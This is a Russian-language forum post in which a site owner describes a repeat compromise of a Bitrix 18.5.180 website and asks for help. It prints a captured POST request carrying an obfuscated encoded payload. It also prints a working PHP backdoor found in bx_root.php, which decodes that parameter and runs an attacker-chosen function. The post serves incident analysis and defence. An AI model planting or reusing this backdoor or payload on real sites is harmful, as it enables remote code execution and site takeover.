Вчера, повторно, поле 24 февраля сайт упал. Во всех разделах создались файлы .htaccess и был вставлен зловредный код в код index.php. После анализа логов было обнаружено что в папке admin были созданы бекдоры с рандомными именами. Создавались эти бекдоры POST запросом к главной странице сайта. Вчера вечером по вашему совету поставил логирования POST запросов к главной странице и это дало результаты. Вот такие запросы прилетают:[CODE]array (
'BX_STAT' => '303q66696p655s7075745s636s6r74656r747326313q6269747269782s6
1646q696r2s6561323033363065653039302r70687026323q3p3s3q34303
93732332n32303o6966286q643528245s434s4s4o49455o645q293q3q223
137303238663438376362326138343630373634366461336164333837386
56322297o6563686s226s6o223o6576616p286261736536345s6465636s6
46528245s524551554553545o69645q29293o696628245s504s53545o227
570225q3q3q22757022297o40636s707928245s46494p45535o2266696p6
5225q5o22746q705s6r616q65225q2p245s46494p45535o2266696p65225
q5o226r616q65225q293o7q7q3s3r',
) [/CODE]
обнаружил код в файле \bitrix\modules\main\bx_root.php
[CODE]<?
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
?> [/CODE]
Что интересно дата bx_root.php такая же как у всех файлов ядра. В других дистрибутивах этого кода не обнаружил и поэтому удалил его. Наблюдаю дальше.
P.S Битрикс 18.5.180.
